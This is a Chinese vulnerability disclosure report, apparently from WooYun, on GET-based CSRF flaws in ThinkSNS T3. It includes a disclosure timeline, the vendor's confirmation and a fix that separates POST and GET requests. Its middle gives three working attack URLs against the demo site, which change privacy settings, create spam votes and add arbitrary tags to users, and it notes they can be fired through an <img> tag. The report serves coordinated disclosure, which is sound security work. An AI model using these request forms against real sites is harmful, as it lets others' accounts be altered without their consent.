2014-02-12:细节已通知厂商并且等待厂商处理中
2014-02-19:厂商已经确认,细节仅向厂商公开
2014-02-22:细节向第三方安全合作伙伴开放
2014-03-01:细节向核心白帽子及相关领域专家公开
2014-03-11:细节向普通白帽子公开
2014-03-31:细节向实习白帽子公开
2014-05-13:细节向公众公开
ThinkSNS多处CSRF(GET型),可造成一定危害
详细说明:就拿你们的演示站点做了测试(是T3的最新版本)
http://demo.thinksns.com/
------
ThinkSNS最新版本内对于POST请求的来源是进行了判断的
但是ThinkSNS最新版本对于POST和GET请求是不分的,而且GET请求的是可以在网站内用<img>标签发起的,将导致严重的安全问题,我就选取了一些发上来。
1)更改个人设置中的隐私设置(通过GET请求实现)
http://demo.thinksns.com/t3/index.php?app=public&mod=Account&act=doSavePrivacy&comment_weibo=1&message=1&space=1
2)发起大量垃圾投票(可刷分/通过GET请求实现):
http://demo.thinksns.com/t3/index.php?app=vote&mod=Index&act=add&date=7&opt%5B%5D=%E4%BD%A0%E5%B8%85&opt%5B%5D=%E6%88%91%E5%B8%85&title=%E7%8E%A9%E7%8E%A9&type=0
3)可给任何用户加“傻X”(任意)标签,请求如下(通过GET请求实现)
http://demo.thinksns.com/t3/index.php?app=public&mod=Account&act=doSaveProfile&tag_num=5&user_tags=785
修复方案:
其实还有很多,我就不全部发上来了。所以重要的操作一定要区分POST和GET。
版权声明:转载请注明来源 我是小号@乌云 漏洞回应 厂商回应:危害等级:中
漏洞Rank:5
确认时间:2014-02-19 17:06
厂商回复:多出细节,非常感谢!
最新状态:暂无
版权与免责声明:
凡注明稿件来源的内容均为转载稿或由网友用户注册发布,本网转载出于传递更多信息的目的;如转载稿涉及版权问题,请作者联系我们,同时对于用户评论等信息,本网并不意味着赞同其观点或证实其内容的真实性;